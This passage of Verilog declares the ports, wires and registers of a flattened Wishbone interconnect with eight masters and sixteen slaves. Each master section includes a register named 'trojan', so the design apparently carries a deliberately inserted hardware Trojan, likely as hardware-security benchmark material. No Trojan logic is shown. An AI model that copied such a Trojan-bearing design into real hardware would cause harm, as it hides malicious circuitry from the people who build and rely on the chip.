    parameter [1:0]s15_msel_pri_enc_pd1_pri_sel  = s15_msel_pri_enc_pri_sel;
    parameter [1:0]s15_msel_pri_enc_pd2_pri_sel  = s15_msel_pri_enc_pri_sel;
    parameter [1:0]s15_msel_pri_enc_pd3_pri_sel  = s15_msel_pri_enc_pri_sel;
    parameter [1:0]s15_msel_pri_enc_pd4_pri_sel  = s15_msel_pri_enc_pri_sel;
    parameter [1:0]s15_msel_pri_enc_pd5_pri_sel  = s15_msel_pri_enc_pri_sel;
    parameter [1:0]s15_msel_pri_enc_pd6_pri_sel  = s15_msel_pri_enc_pri_sel;
    parameter [1:0]s15_msel_pri_enc_pd7_pri_sel  = s15_msel_pri_enc_pri_sel;
    parameter [2:0]s15_msel_arb0_grant0  = 3'h0;
    parameter [2:0]s15_msel_arb0_grant1  = 3'h1;
    parameter [2:0]s15_msel_arb0_grant2  = 3'h2;
    parameter [2:0]s15_msel_arb0_grant3  = 3'h3;
    parameter [2:0]s15_msel_arb0_grant4  = 3'h4;
    parameter [2:0]s15_msel_arb0_grant5  = 3'h5;
    parameter [2:0]s15_msel_arb0_grant6  = 3'h6;
    parameter [2:0]s15_msel_arb0_grant7  = 3'h7;
    parameter [2:0]s15_msel_arb1_grant0  = 3'h0;
    parameter [2:0]s15_msel_arb1_grant1  = 3'h1;
    parameter [2:0]s15_msel_arb1_grant2  = 3'h2;
    parameter [2:0]s15_msel_arb1_grant3  = 3'h3;
    parameter [2:0]s15_msel_arb1_grant4  = 3'h4;
    parameter [2:0]s15_msel_arb1_grant5  = 3'h5;
    parameter [2:0]s15_msel_arb1_grant6  = 3'h6;
    parameter [2:0]s15_msel_arb1_grant7  = 3'h7;
    parameter [2:0]s15_msel_arb2_grant0  = 3'h0;
    parameter [2:0]s15_msel_arb2_grant1  = 3'h1;
    parameter [2:0]s15_msel_arb2_grant2  = 3'h2;
    parameter [2:0]s15_msel_arb2_grant3  = 3'h3;
    parameter [2:0]s15_msel_arb2_grant4  = 3'h4;
    parameter [2:0]s15_msel_arb2_grant5  = 3'h5;
    parameter [2:0]s15_msel_arb2_grant6  = 3'h6;
    parameter [2:0]s15_msel_arb2_grant7  = 3'h7;
    parameter [2:0]s15_msel_arb3_grant0  = 3'h0;
    parameter [2:0]s15_msel_arb3_grant1  = 3'h1;
    parameter [2:0]s15_msel_arb3_grant2  = 3'h2;
    parameter [2:0]s15_msel_arb3_grant3  = 3'h3;
    parameter [2:0]s15_msel_arb3_grant4  = 3'h4;
    parameter [2:0]s15_msel_arb3_grant5  = 3'h5;
    parameter [2:0]s15_msel_arb3_grant6  = 3'h6;
    parameter [2:0]s15_msel_arb3_grant7  = 3'h7;
    parameter [3:0]rf_rf_addr  = rf_addr;
    parameter rf_dw  = dw;
    parameter rf_aw  = aw;
    parameter rf_sw  = sw;
    input clk_i;
    input rst_i;
    input [( dw - 1 ):0]m0_data_i;
    output [( dw - 1 ):0]m0_data_o;
    input [( aw - 1 ):0]m0_addr_i;
    input [( sw - 1 ):0]m0_sel_i;
    input m0_we_i;
    input m0_cyc_i;
    input m0_stb_i;
    output m0_ack_o;
    output m0_err_o;
    output m0_rty_o;
    input [( dw - 1 ):0]m1_data_i;
    output [( dw - 1 ):0]m1_data_o;
    input [( aw - 1 ):0]m1_addr_i;
    input [( sw - 1 ):0]m1_sel_i;
    input m1_we_i;
    input m1_cyc_i;
    input m1_stb_i;
    output m1_ack_o;
    output m1_err_o;
    output m1_rty_o;
    input [( dw - 1 ):0]m2_data_i;
    output [( dw - 1 ):0]m2_data_o;
    input [( aw - 1 ):0]m2_addr_i;
    input [( sw - 1 ):0]m2_sel_i;
    input m2_we_i;
    input m2_cyc_i;
    input m2_stb_i;
    output m2_ack_o;
    output m2_err_o;
    output m2_rty_o;
    input [( dw - 1 ):0]m3_data_i;
    output [( dw - 1 ):0]m3_data_o;
    input [( aw - 1 ):0]m3_addr_i;
    input [( sw - 1 ):0]m3_sel_i;
    input m3_we_i;
    input m3_cyc_i;
    input m3_stb_i;
    output m3_ack_o;
    output m3_err_o;
    output m3_rty_o;
    input [( dw - 1 ):0]m4_data_i;
    output [( dw - 1 ):0]m4_data_o;
    input [( aw - 1 ):0]m4_addr_i;
    input [( sw - 1 ):0]m4_sel_i;
    input m4_we_i;
    input m4_cyc_i;
    input m4_stb_i;
    output m4_ack_o;
    output m4_err_o;
    output m4_rty_o;
    input [( dw - 1 ):0]m5_data_i;
    output [( dw - 1 ):0]m5_data_o;
    input [( aw - 1 ):0]m5_addr_i;
    input [( sw - 1 ):0]m5_sel_i;
    input m5_we_i;
    input m5_cyc_i;
    input m5_stb_i;
    output m5_ack_o;
    output m5_err_o;
    output m5_rty_o;
    input [( dw - 1 ):0]m6_data_i;
    output [( dw - 1 ):0]m6_data_o;
    input [( aw - 1 ):0]m6_addr_i;
    input [( sw - 1 ):0]m6_sel_i;
    input m6_we_i;
    input m6_cyc_i;
    input m6_stb_i;
    output m6_ack_o;
    output m6_err_o;
    output m6_rty_o;
    input [( dw - 1 ):0]m7_data_i;
    output [( dw - 1 ):0]m7_data_o;
    input [( aw - 1 ):0]m7_addr_i;
    input [( sw - 1 ):0]m7_sel_i;
    input m7_we_i;
    input m7_cyc_i;
    input m7_stb_i;
    output m7_ack_o;
    output m7_err_o;
    output m7_rty_o;
    input [( dw - 1 ):0]s0_data_i;
    output [( dw - 1 ):0]s0_data_o;
    output [( aw - 1 ):0]s0_addr_o;
    output [( sw - 1 ):0]s0_sel_o;
    output s0_we_o;
    output s0_cyc_o;
    output s0_stb_o;
    input s0_ack_i;
    input s0_err_i;
    input s0_rty_i;
    input [( dw - 1 ):0]s1_data_i;
    output [( dw - 1 ):0]s1_data_o;
    output [( aw - 1 ):0]s1_addr_o;
    output [( sw - 1 ):0]s1_sel_o;
    output s1_we_o;
    output s1_cyc_o;
    output s1_stb_o;
    input s1_ack_i;
    input s1_err_i;
    input s1_rty_i;
    input [( dw - 1 ):0]s2_data_i;
    output [( dw - 1 ):0]s2_data_o;
    output [( aw - 1 ):0]s2_addr_o;
    output [( sw - 1 ):0]s2_sel_o;
    output s2_we_o;
    output s2_cyc_o;
    output s2_stb_o;
    input s2_ack_i;
    input s2_err_i;
    input s2_rty_i;
    input [( dw - 1 ):0]s3_data_i;
    output [( dw - 1 ):0]s3_data_o;
    output [( aw - 1 ):0]s3_addr_o;
    output [( sw - 1 ):0]s3_sel_o;
    output s3_we_o;
    output s3_cyc_o;
    output s3_stb_o;
    input s3_ack_i;
    input s3_err_i;
    input s3_rty_i;
    input [( dw - 1 ):0]s4_data_i;
    output [( dw - 1 ):0]s4_data_o;
    output [( aw - 1 ):0]s4_addr_o;
    output [( sw - 1 ):0]s4_sel_o;
    output s4_we_o;
    output s4_cyc_o;
    output s4_stb_o;
    input s4_ack_i;
    input s4_err_i;
    input s4_rty_i;
    input [( dw - 1 ):0]s5_data_i;
    output [( dw - 1 ):0]s5_data_o;
    output [( aw - 1 ):0]s5_addr_o;
    output [( sw - 1 ):0]s5_sel_o;
    output s5_we_o;
    output s5_cyc_o;
    output s5_stb_o;
    input s5_ack_i;
    input s5_err_i;
    input s5_rty_i;
    input [( dw - 1 ):0]s6_data_i;
    output [( dw - 1 ):0]s6_data_o;
    output [( aw - 1 ):0]s6_addr_o;
    output [( sw - 1 ):0]s6_sel_o;
    output s6_we_o;
    output s6_cyc_o;
    output s6_stb_o;
    input s6_ack_i;
    input s6_err_i;
    input s6_rty_i;
    input [( dw - 1 ):0]s7_data_i;
    output [( dw - 1 ):0]s7_data_o;
    output [( aw - 1 ):0]s7_addr_o;
    output [( sw - 1 ):0]s7_sel_o;
    output s7_we_o;
    output s7_cyc_o;
    output s7_stb_o;
    input s7_ack_i;
    input s7_err_i;
    input s7_rty_i;
    input [( dw - 1 ):0]s8_data_i;
    output [( dw - 1 ):0]s8_data_o;
    output [( aw - 1 ):0]s8_addr_o;
    output [( sw - 1 ):0]s8_sel_o;
    output s8_we_o;
    output s8_cyc_o;
    output s8_stb_o;
    input s8_ack_i;
    input s8_err_i;
    input s8_rty_i;
    input [( dw - 1 ):0]s9_data_i;
    output [( dw - 1 ):0]s9_data_o;
    output [( aw - 1 ):0]s9_addr_o;
    output [( sw - 1 ):0]s9_sel_o;
    output s9_we_o;
    output s9_cyc_o;
    output s9_stb_o;
    input s9_ack_i;
    input s9_err_i;
    input s9_rty_i;
    input [( dw - 1 ):0]s10_data_i;
    output [( dw - 1 ):0]s10_data_o;
    output [( aw - 1 ):0]s10_addr_o;
    output [( sw - 1 ):0]s10_sel_o;
    output s10_we_o;
    output s10_cyc_o;
    output s10_stb_o;
    input s10_ack_i;
    input s10_err_i;
    input s10_rty_i;
    input [( dw - 1 ):0]s11_data_i;
    output [( dw - 1 ):0]s11_data_o;
    output [( aw - 1 ):0]s11_addr_o;
    output [( sw - 1 ):0]s11_sel_o;
    output s11_we_o;
    output s11_cyc_o;
    output s11_stb_o;
    input s11_ack_i;
    input s11_err_i;
    input s11_rty_i;
    input [( dw - 1 ):0]s12_data_i;
    output [( dw - 1 ):0]s12_data_o;
    output [( aw - 1 ):0]s12_addr_o;
    output [( sw - 1 ):0]s12_sel_o;
    output s12_we_o;
    output s12_cyc_o;
    output s12_stb_o;
    input s12_ack_i;
    input s12_err_i;
    input s12_rty_i;
    input [( dw - 1 ):0]s13_data_i;
    output [( dw - 1 ):0]s13_data_o;
    output [( aw - 1 ):0]s13_addr_o;
    output [( sw - 1 ):0]s13_sel_o;
    output s13_we_o;
    output s13_cyc_o;
    output s13_stb_o;
    input s13_ack_i;
    input s13_err_i;
    input s13_rty_i;
    input [( dw - 1 ):0]s14_data_i;
    output [( dw - 1 ):0]s14_data_o;
    output [( aw - 1 ):0]s14_addr_o;
    output [( sw - 1 ):0]s14_sel_o;
    output s14_we_o;
    output s14_cyc_o;
    output s14_stb_o;
    input s14_ack_i;
    input s14_err_i;
    input s14_rty_i;
    input [( dw - 1 ):0]s15_data_i;
    output [( dw - 1 ):0]s15_data_o;
    output [( aw - 1 ):0]s15_addr_o;
    output [( sw - 1 ):0]s15_sel_o;
    output s15_we_o;
    output s15_cyc_o;
    output s15_stb_o;
    input s15_ack_i;
    input s15_err_i;
    input s15_rty_i;
    wire [( m0_dw - 1 ):0]m0_wb_data_i;
    wire [( m0_aw - 1 ):0]m0_wb_addr_i;
    wire [( m0_sw - 1 ):0]m0_wb_sel_i;
    wire m0_wb_we_i;
    reg [( m0_dw - 1 ):0]m0_wb_data_o;
    reg m0_wb_ack_o;
    reg m0_wb_err_o;
    reg m0_wb_rty_o;
    reg [3:0]m0_slv_sel;
    reg m0_s0_cyc_o;
    reg m0_s1_cyc_o;
    reg m0_s2_cyc_o;
    reg m0_s3_cyc_o;
    reg m0_s4_cyc_o;
    reg m0_s5_cyc_o;
    reg m0_s6_cyc_o;
    reg m0_s7_cyc_o;
    reg m0_s8_cyc_o;
    reg m0_s9_cyc_o;
    reg m0_s10_cyc_o;
    reg m0_s11_cyc_o;
    reg m0_s12_cyc_o;
    reg m0_s13_cyc_o;
    reg m0_s14_cyc_o;
    reg m0_s15_cyc_o;
    reg m0_trojan;
    wire [( m1_dw - 1 ):0]m1_wb_data_i;
    wire [( m1_aw - 1 ):0]m1_wb_addr_i;
    wire [( m1_sw - 1 ):0]m1_wb_sel_i;
    wire m1_wb_we_i;
    reg [( m1_dw - 1 ):0]m1_wb_data_o;
    reg m1_wb_ack_o;
    reg m1_wb_err_o;
    reg m1_wb_rty_o;
    reg [3:0]m1_slv_sel;
    reg m1_s0_cyc_o;
    reg m1_s1_cyc_o;
    reg m1_s2_cyc_o;
    reg m1_s3_cyc_o;
    reg m1_s4_cyc_o;
    reg m1_s5_cyc_o;
    reg m1_s6_cyc_o;
    reg m1_s7_cyc_o;
    reg m1_s8_cyc_o;
    reg m1_s9_cyc_o;
    reg m1_s10_cyc_o;
    reg m1_s11_cyc_o;
    reg m1_s12_cyc_o;
    reg m1_s13_cyc_o;
    reg m1_s14_cyc_o;
    reg m1_s15_cyc_o;
    reg m1_trojan;
    wire [( m2_dw - 1 ):0]m2_wb_data_i;
    wire [( m2_aw - 1 ):0]m2_wb_addr_i;
    wire [( m2_sw - 1 ):0]m2_wb_sel_i;
    wire m2_wb_we_i;
    reg [( m2_dw - 1 ):0]m2_wb_data_o;
    reg m2_wb_ack_o;
    reg m2_wb_err_o;
    reg m2_wb_rty_o;
    reg [3:0]m2_slv_sel;
    reg m2_s0_cyc_o;
    reg m2_s1_cyc_o;
    reg m2_s2_cyc_o;
    reg m2_s3_cyc_o;
    reg m2_s4_cyc_o;
    reg m2_s5_cyc_o;
    reg m2_s6_cyc_o;
    reg m2_s7_cyc_o;
    reg m2_s8_cyc_o;
    reg m2_s9_cyc_o;
    reg m2_s10_cyc_o;
    reg m2_s11_cyc_o;
    reg m2_s12_cyc_o;
    reg m2_s13_cyc_o;
    reg m2_s14_cyc_o;
    reg m2_s15_cyc_o;
    reg m2_trojan;
    wire [( m3_dw - 1 ):0]m3_wb_data_i;
    wire [( m3_aw - 1 ):0]m3_wb_addr_i;
    wire [( m3_sw - 1 ):0]m3_wb_sel_i;
    wire m3_wb_we_i;
    reg [( m3_dw - 1 ):0]m3_wb_data_o;
    reg m3_wb_ack_o;
    reg m3_wb_err_o;
    reg m3_wb_rty_o;
    reg [3:0]m3_slv_sel;
    reg m3_s0_cyc_o;
    reg m3_s1_cyc_o;
    reg m3_s2_cyc_o;
    reg m3_s3_cyc_o;
    reg m3_s4_cyc_o;
    reg m3_s5_cyc_o;
    reg m3_s6_cyc_o;
    reg m3_s7_cyc_o;
    reg m3_s8_cyc_o;
    reg m3_s9_cyc_o;
    reg m3_s10_cyc_o;
    reg m3_s11_cyc_o;
    reg m3_s12_cyc_o;
    reg m3_s13_cyc_o;
    reg m3_s14_cyc_o;
    reg m3_s15_cyc_o;
    reg m3_trojan;
    wire [( m4_dw - 1 ):0]m4_wb_data_i;
    wire [( m4_aw - 1 ):0]m4_wb_addr_i;
    wire [( m4_sw - 1 ):0]m4_wb_sel_i;
    wire m4_wb_we_i;
    reg [( m4_dw - 1 ):0]m4_wb_data_o;
    reg m4_wb_ack_o;
    reg m4_wb_err_o;
    reg m4_wb_rty_o;
    reg [3:0]m4_slv_sel;
    reg m4_s0_cyc_o;
    reg m4_s1_cyc_o;
    reg m4_s2_cyc_o;
    reg m4_s3_cyc_o;
    reg m4_s4_cyc_o;
    reg m4_s5_cyc_o;
    reg m4_s6_cyc_o;
    reg m4_s7_cyc_o;
    reg m4_s8_cyc_o;
    reg m4_s9_cyc_o;
    reg m4_s10_cyc_o;
    reg m4_s11_cyc_o;
    reg m4_s12_cyc_o;
    reg m4_s13_cyc_o;
    reg m4_s14_cyc_o;
    reg m4_s15_cyc_o;
    reg m4_trojan;
    wire [( m5_dw - 1 ):0]m5_wb_data_i;
    wire [( m5_aw - 1 ):0]m5_wb_addr_i;
    wire [( m5_sw - 1 ):0]m5_wb_sel_i;
    wire m5_wb_we_i;
    reg [( m5_dw - 1 ):0]m5_wb_data_o;
    reg m5_wb_ack_o;
    reg m5_wb_err_o;
    reg m5_wb_rty_o;
    reg [3:0]m5_slv_sel;
    reg m5_s0_cyc_o;
    reg m5_s1_cyc_o;
    reg m5_s2_cyc_o;
    reg m5_s3_cyc_o;
    reg m5_s4_cyc_o;
    reg m5_s5_cyc_o;
    reg m5_s6_cyc_o;
    reg m5_s7_cyc_o;
    reg m5_s8_cyc_o;
    reg m5_s9_cyc_o;
    reg m5_s10_cyc_o;
    reg m5_s11_cyc_o;
    reg m5_s12_cyc_o;
    reg m5_s13_cyc_o;
    reg m5_s14_cyc_o;
    reg m5_s15_cyc_o;
    reg m5_trojan;
    wire [( m6_dw - 1 ):0]m6_wb_data_i;
    wire [( m6_aw - 1 ):0]m6_wb_addr_i;
    wire [( m6_sw - 1 ):0]m6_wb_sel_i;
    wire m6_wb_we_i;
    reg [( m6_dw - 1 ):0]m6_wb_data_o;
    reg m6_wb_ack_o;
    reg m6_wb_err_o;
    reg m6_wb_rty_o;
    reg [3:0]m6_slv_sel;
    reg m6_s0_cyc_o;
    reg m6_s1_cyc_o;
    reg m6_s2_cyc_o;
    reg m6_s3_cyc_o;
    reg m6_s4_cyc_o;
    reg m6_s5_cyc_o;
    reg m6_s6_cyc_o;
    reg m6_s7_cyc_o;
    reg m6_s8_cyc_o;
    reg m6_s9_cyc_o;
    reg m6_s10_cyc_o;
    reg m6_s11_cyc_o;
    reg m6_s12_cyc_o;
    reg m6_s13_cyc_o;
    reg m6_s14_cyc_o;
    reg m6_s15_cyc_o;
    reg m6_trojan;
    wire [( m7_dw - 1 ):0]m7_wb_data_i;
    wire [( m7_aw - 1 ):0]m7_wb_addr_i;
    wire [( m7_sw - 1 ):0]m7_wb_sel_i;
    wire m7_wb_we_i;
    reg [( m7_dw - 1 ):0]m7_wb_data_o;
    reg m7_wb_ack_o;
    reg m7_wb_err_o;
    reg m7_wb_rty_o;
    reg [3:0]m7_slv_sel;
    reg m7_s0_cyc_o;
    reg m7_s1_cyc_o;
    reg m7_s2_cyc_o;
    reg m7_s3_cyc_o;
    reg m7_s4_cyc_o;
    reg m7_s5_cyc_o;
    reg m7_s6_cyc_o;
    reg m7_s7_cyc_o;
    reg m7_s8_cyc_o;
    reg m7_s9_cyc_o;
    reg m7_s10_cyc_o;
    reg m7_s11_cyc_o;
    reg m7_s12_cyc_o;
    reg m7_s13_cyc_o;
    reg m7_s14_cyc_o;
    reg m7_s15_cyc_o;
    reg m7_trojan;
    wire [( s0_dw - 1 ):0]s0_wb_data_i;
    wire s0_wb_ack_i;
    wire s0_wb_err_i;
    wire s0_wb_rty_i;
    wire [( s0_dw - 1 ):0]s0_m0_data_o;
    wire s0_m0_ack_o;
    wire s0_m0_err_o;
    wire s0_m0_rty_o;
    wire [( s0_dw - 1 ):0]s0_m1_data_o;
    wire s0_m1_ack_o;
    wire s0_m1_err_o;
    wire s0_m1_rty_o;
    wire [( s0_dw - 1 ):0]s0_m2_data_o;
    wire s0_m2_ack_o;
    wire s0_m2_err_o;
    wire s0_m2_rty_o;
    wire [( s0_dw - 1 ):0]s0_m3_data_o;
    wire s0_m3_ack_o;
    wire s0_m3_err_o;
    wire s0_m3_rty_o;
    wire [( s0_dw - 1 ):0]s0_m4_data_o;
    wire s0_m4_ack_o;
    wire s0_m4_err_o;
    wire s0_m4_rty_o;
    wire [( s0_dw - 1 ):0]s0_m5_data_o;
    wire s0_m5_ack_o;
    wire s0_m5_err_o;
    wire s0_m5_rty_o;
    wire [( s0_dw - 1 ):0]s0_m6_data_o;
    wire s0_m6_ack_o;
    wire s0_m6_err_o;
    wire s0_m6_rty_o;
    wire [( s0_dw - 1 ):0]s0_m7_data_o;
    wire s0_m7_ack_o;
    wire s0_m7_err_o;
    wire s0_m7_rty_o;
    reg [( s0_aw - 1 ):0]s0_wb_addr_o;
    reg [( s0_dw - 1 ):0]s0_wb_data_o;
    reg [( s0_sw - 1 ):0]s0_wb_sel_o;
    reg s0_wb_we_o;
    reg s0_wb_cyc_o;
    reg s0_wb_stb_o;
    wire [2:0]s0_mast_sel;
    reg s0_next;
    reg s0_m0_cyc_r;
    reg s0_m1_cyc_r;
    reg s0_m2_cyc_r;
    reg s0_m3_cyc_r;
    reg s0_m4_cyc_r;
    reg s0_m5_cyc_r;
    reg s0_m6_cyc_r;
    reg s0_m7_cyc_r;
    wire [7:0]s0_arb_req;
    reg [2:0]s0_arb_state;
    reg [2:0]s0_arb_next_state;
    wire [7:0]s0_msel_req;
    reg [1:0]s0_msel_pri_out;
    reg [2:0]s0_msel_sel1;
    reg [2:0]s0_msel_sel2;
    wire [7:0]s0_msel_pri_enc_valid;
    wire [3:0]s0_msel_pri_enc_pri_out_tmp;
    reg [1:0]s0_msel_pri_enc_pri_out0;
    reg [1:0]s0_msel_pri_enc_pri_out1;
    reg [3:0]s0_msel_pri_enc_pd0_pri_out_d0;
    reg [3:0]s0_msel_pri_enc_pd0_pri_out_d1;
    reg [3:0]s0_msel_pri_enc_pd1_pri_out_d0;
    reg [3:0]s0_msel_pri_enc_pd1_pri_out_d1;
    reg [3:0]s0_msel_pri_enc_pd2_pri_out_d0;
    reg [3:0]s0_msel_pri_enc_pd2_pri_out_d1;
    reg [3:0]s0_msel_pri_enc_pd3_pri_out_d0;
    reg [3:0]s0_msel_pri_enc_pd3_pri_out_d1;
    reg [3:0]s0_msel_pri_enc_pd4_pri_out_d0;
    reg [3:0]s0_msel_pri_enc_pd4_pri_out_d1;
    reg [3:0]s0_msel_pri_enc_pd5_pri_out_d0;
    reg [3:0]s0_msel_pri_enc_pd5_pri_out_d1;
    reg [3:0]s0_msel_pri_enc_pd6_pri_out_d0;
    reg [3:0]s0_msel_pri_enc_pd6_pri_out_d1;
    reg [3:0]s0_msel_pri_enc_pd7_pri_out_d0;
    reg [3:0]s0_msel_pri_enc_pd7_pri_out_d1;
    wire [7:0]s0_msel_arb0_req;
    wire [2:0]s0_msel_arb0_gnt;
    reg [2:0]s0_msel_arb0_state;
    reg [2:0]s0_msel_arb0_next_state;
    wire [7:0]s0_msel_arb1_req;
    reg [2:0]s0_msel_arb1_state;
    reg [2:0]s0_msel_arb1_next_state;
    wire [7:0]s0_msel_arb2_req;
    reg [2:0]s0_msel_arb2_state;
    reg [2:0]s0_msel_arb2_next_state;
    wire [7:0]s0_msel_arb3_req;
    reg [2:0]s0_msel_arb3_state;
    reg [2:0]s0_msel_arb3_next_state;
    wire [( s1_dw - 1 ):0]s1_wb_data_i;
    wire s1_wb_ack_i;
    wire s1_wb_err_i;
    wire s1_wb_rty_i;
    wire [( s1_dw - 1 ):0]s1_m0_data_o;
    wire s1_m0_ack_o;
    wire s1_m0_err_o;
    wire s1_m0_rty_o;
    wire [( s1_dw - 1 ):0]s1_m1_data_o;
    wire s1_m1_ack_o;
    wire s1_m1_err_o;
    wire s1_m1_rty_o;
    wire [( s1_dw - 1 ):0]s1_m2_data_o;
    wire s1_m2_ack_o;
    wire s1_m2_err_o;
    wire s1_m2_rty_o;
    wire [( s1_dw - 1 ):0]s1_m3_data_o;
    wire s1_m3_ack_o;
    wire s1_m3_err_o;
    wire s1_m3_rty_o;
    wire [( s1_dw - 1 ):0]s1_m4_data_o;
    wire s1_m4_ack_o;
    wire s1_m4_err_o;
    wire s1_m4_rty_o;
    wire [( s1_dw - 1 ):0]s1_m5_data_o;
    wire s1_m5_ack_o;
    wire s1_m5_err_o;
    wire s1_m5_rty_o;
    wire [( s1_dw - 1 ):0]s1_m6_data_o;
    wire s1_m6_ack_o;
    wire s1_m6_err_o;
    wire s1_m6_rty_o;
    wire [( s1_dw - 1 ):0]s1_m7_data_o;
    wire s1_m7_ack_o;
    wire s1_m7_err_o;
    wire s1_m7_rty_o;
    reg [( s1_aw - 1 ):0]s1_wb_addr_o;
    reg [( s1_dw - 1 ):0]s1_wb_data_o;
    reg [( s1_sw - 1 ):0]s1_wb_sel_o;
    reg s1_wb_we_o;
    reg s1_wb_cyc_o;
    reg s1_wb_stb_o;
    wire [2:0]s1_mast_sel;
    reg s1_next;
    reg s1_m0_cyc_r;
    reg s1_m1_cyc_r;
    reg s1_m2_cyc_r;
    reg s1_m3_cyc_r;
    reg s1_m4_cyc_r;
    reg s1_m5_cyc_r;
    reg s1_m6_cyc_r;
    reg s1_m7_cyc_r;
    wire [7:0]s1_arb_req;
    reg [2:0]s1_arb_state;
    reg [2:0]s1_arb_next_state;
    wire [7:0]s1_msel_req;
    reg [1:0]s1_msel_pri_out;
    reg [2:0]s1_msel_sel1;
    reg [2:0]s1_msel_sel2;
    wire [7:0]s1_msel_pri_enc_valid;
    wire [3:0]s1_msel_pri_enc_pri_out_tmp;
    reg [1:0]s1_msel_pri_enc_pri_out0;
    reg [1:0]s1_msel_pri_enc_pri_out1;
    reg [3:0]s1_msel_pri_enc_pd0_pri_out_d0;
    reg [3:0]s1_msel_pri_enc_pd0_pri_out_d1;
    reg [3:0]s1_msel_pri_enc_pd1_pri_out_d0;
    reg [3:0]s1_msel_pri_enc_pd1_pri_out_d1;
    reg [3:0]s1_msel_pri_enc_pd2_pri_out_d0;
    reg [3:0]s1_msel_pri_enc_pd2_pri_out_d1;
    reg [3:0]s1_msel_pri_enc_pd3_pri_out_d0;
    reg [3:0]s1_msel_pri_enc_pd3_pri_out_d1;
    reg [3:0]s1_msel_pri_enc_pd4_pri_out_d0;
    reg [3:0]s1_msel_pri_enc_pd4_pri_out_d1;
    reg [3:0]s1_msel_pri_enc_pd5_pri_out_d0;
    reg [3:0]s1_msel_pri_enc_pd5_pri_out_d1;
    reg [3:0]s1_msel_pri_enc_pd6_pri_out_d0;
    reg [3:0]s1_msel_pri_enc_pd6_pri_out_d1;
    reg [3:0]s1_msel_pri_enc_pd7_pri_out_d0;
    reg [3:0]s1_msel_pri_enc_pd7_pri_out_d1;
    wire [7:0]s1_msel_arb0_req;
    wire [2:0]s1_msel_arb0_gnt;
    reg [2:0]s1_msel_arb0_state;
    reg [2:0]s1_msel_arb0_next_state;
    wire [7:0]s1_msel_arb1_req;
    reg [2:0]s1_msel_arb1_state;
    reg [2:0]s1_msel_arb1_next_state;
    wire [7:0]s1_msel_arb2_req;
    reg [2:0]s1_msel_arb2_state;
    reg [2:0]s1_msel_arb2_next_state;
    wire [7:0]s1_msel_arb3_req;
    reg [2:0]s1_msel_arb3_state;
    reg [2:0]s1_msel_arb3_next_state;
    wire [( s2_dw - 1 ):0]s2_wb_data_i;
    wire s2_wb_ack_i;
    wire s2_wb_err_i;
    wire s2_wb_rty_i;
    wire [( s2_dw - 1 ):0]s2_m0_data_o;
    wire s2_m0_ack_o;
    wire s2_m0_err_o;
    wire s2_m0_rty_o;
    wire [( s2_dw - 1 ):0]s2_m1_data_o;
    wire s2_m1_ack_o;
    wire s2_m1_err_o;
    wire s2_m1_rty_o;
    wire [( s2_dw - 1 ):0]s2_m2_data_o;
    wire s2_m2_ack_o;
    wire s2_m2_err_o;
    wire s2_m2_rty_o;
    wire [( s2_dw - 1 ):0]s2_m3_data_o;
    wire s2_m3_ack_o;
    wire s2_m3_err_o;
    wire s2_m3_rty_o;
    wire [( s2_dw - 1 ):0]s2_m4_data_o;
    wire s2_m4_ack_o;
    wire s2_m4_err_o;
    wire s2_m4_rty_o;
    wire [( s2_dw - 1 ):0]s2_m5_data_o;
    wire s2_m5_ack_o;
    wire s2_m5_err_o;
    wire s2_m5_rty_o;
    wire [( s2_dw - 1 ):0]s2_m6_data_o;
    wire s2_m6_ack_o;
    wire s2_m6_err_o;
    wire s2_m6_rty_o;
    wire [( s2_dw - 1 ):0]s2_m7_data_o;
    wire s2_m7_ack_o;
    wire s2_m7_err_o;
    wire s2_m7_rty_o;
    reg [( s2_aw - 1 ):0]s2_wb_addr_o;
    reg [( s2_dw - 1 ):0]s2_wb_data_o;
    reg [( s2_sw - 1 ):0]s2_wb_sel_o;
    reg s2_wb_we_o;
    reg s2_wb_cyc_o;
    reg s2_wb_stb_o;
    wire [2:0]s2_mast_sel;
    reg s2_next;
    reg s2_m0_cyc_r;
    reg s2_m1_cyc_r;
    reg s2_m2_cyc_r;
    reg s2_m3_cyc_r;
    reg s2_m4_cyc_r;
    reg s2_m5_cyc_r;
    reg s2_m6_cyc_r;
    reg s2_m7_cyc_r;
    wire [7:0]s2_arb_req;
    reg [2:0]s2_arb_state;
    reg [2:0]s2_arb_next_state;
    wire [7:0]s2_msel_req;
    reg [1:0]s2_msel_pri_out;
    reg [2:0]s2_msel_sel1;
    reg [2:0]s2_msel_sel2;
    wire [7:0]s2_msel_pri_enc_valid;
    wire [3:0]s2_msel_pri_enc_pri_out_tmp;
    reg [1:0]s2_msel_pri_enc_pri_out0;
    reg [1:0]s2_msel_pri_enc_pri_out1;
    reg [3:0]s2_msel_pri_enc_pd0_pri_out_d0;
    reg [3:0]s2_msel_pri_enc_pd0_pri_out_d1;
    reg [3:0]s2_msel_pri_enc_pd1_pri_out_d0;
    reg [3:0]s2_msel_pri_enc_pd1_pri_out_d1;
    reg [3:0]s2_msel_pri_enc_pd2_pri_out_d0;
    reg [3:0]s2_msel_pri_enc_pd2_pri_out_d1;
    reg [3:0]s2_msel_pri_enc_pd3_pri_out_d0;
    reg [3:0]s2_msel_pri_enc_pd3_pri_out_d1;
    reg [3:0]s2_msel_pri_enc_pd4_pri_out_d0;
    reg [3:0]s2_msel_pri_enc_pd4_pri_out_d1;
    reg [3:0]s2_msel_pri_enc_pd5_pri_out_d0;
    reg [3:0]s2_msel_pri_enc_pd5_pri_out_d1;
    reg [3:0]s2_msel_pri_enc_pd6_pri_out_d0;
    reg [3:0]s2_msel_pri_enc_pd6_pri_out_d1;
    reg [3:0]s2_msel_pri_enc_pd7_pri_out_d0;
    reg [3:0]s2_msel_pri_enc_pd7_pri_out_d1;
    wire [7:0]s2_msel_arb0_req;
    wire [2:0]s2_msel_arb0_gnt;
    reg [2:0]s2_msel_arb0_state;
    reg [2:0]s2_msel_arb0_next_state;
    wire [7:0]s2_msel_arb1_req;
    reg [2:0]s2_msel_arb1_state;
    reg [2:0]s2_msel_arb1_next_state;
    wire [7:0]s2_msel_arb2_req;
    reg [2:0]s2_msel_arb2_state;
    reg [2:0]s2_msel_arb2_next_state;
    wire [7:0]s2_msel_arb3_req;
    reg [2:0]s2_msel_arb3_state;
    reg [2:0]s2_msel_arb3_next_state;
    wire [( s3_dw - 1 ):0]s3_wb_data_i;
    wire s3_wb_ack_i;
    wire s3_wb_err_i;
    wire s3_wb_rty_i;
    wire [( s3_dw - 1 ):0]s3_m0_data_o;
    wire s3_m0_ack_o;
    wire s3_m0_err_o;
    wire s3_m0_rty_o;
    wire [( s3_dw - 1 ):0]s3_m1_data_o;
